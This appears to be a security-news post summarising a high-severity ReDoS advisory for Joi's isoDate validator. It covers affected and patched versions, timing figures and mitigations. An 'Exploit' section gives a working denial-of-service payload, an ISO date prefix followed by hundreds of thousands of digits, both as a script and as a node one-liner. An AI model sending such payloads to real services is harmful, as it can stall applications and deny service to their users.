Listen to this Post
Joi is a validation library used by Node.js applications.
Joi.string().isoDate() validates ISO 8601 date strings.
The rule applies regular expressions to user-supplied input.
One regular expression was unanchored.
An unanchored regex can match starting at any position.
The engine attempts matches at each character offset.
A valid ISO date prefix can trigger this search.
A long run of fractional-second digits follows it.
The regex engine restarts its search from every position.
This causes quadratic regular-expression backtracking.
Cost grows with the square of input length.
64 KB of digits costs about 1.4 seconds.
256 KB of digits costs about 22 seconds.
A single request can stall the event loop.
Any application validating user strings is affected.
The vulnerability affects Joi versions >= 17.2.0, < 17.13.7.
It also affects >= 18.0.0, < 18.2.6.
Patched versions are 17.13.7 and 18.2.6.
GitHub reviewed the advisory as high severity.
The advisory was published Sep 2, 2026.
It was updated Sep 29, 2026.
No workaround exists except capping string length.
Capping must occur before input reaches Joi.
The flaw is a denial-of-service condition.
It does not require authentication in many apps.
It can be triggered by one crafted request.
The regex is part of the isoDate validation rule.
Anchoring the regex would prevent the restart.
Upgrading to a patched version removes the flaw.
Applications should treat validation input as untrusted.
DailyCVE Form:
Platform: hapijs/joi
Version: 17.2.0–17.13.6, 18.0.0–18.2.5
Vulnerability: Quadratic regex backtracking
Severity: High
date: Sep 2, 2026
Prediction: 2026-09-29
(end of form)
What Undercode Say:
Analytics:
npm ls joi npm view joi versions --json npm install [email protected] npm install [email protected]
const Joi = require('joi');
const schema = Joi.string().isoDate();
const payload = '2026-09-29T00:00:00.' + '1'.repeat(65536);
schema.validate(payload);
time node iso-date-test.js grep -R "isoDate" node_modules/joi/lib
Exploit: (Educational Purposes!)
const Joi = require('joi');
const schema = Joi.string().isoDate();
const input = '2026-09-29T00:00:00.' + '9'.repeat(262144);
schema.validate(input);
node -e "const Joi=require('joi'); const s=Joi.string().isoDate(); const p='2026-09-29T00:00:00.'+'9'.repeat(262144); console.time('v'); s.validate(p); console.timeEnd('v');"
Protection: from this CVE
Upgrade to 17.13.7 or 18.2.6.
Cap string length before Joi.
Reject oversized ISO date input.
Use anchored validation where possible.
Monitor event loop latency.
Impact:
Single request stalls application.
Event loop blocking.
Denial of service.
Quadratic CPU cost.
64 KB costs 1.4 s.
256 KB costs 22 s.
No authentication needed if endpoint validates input.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

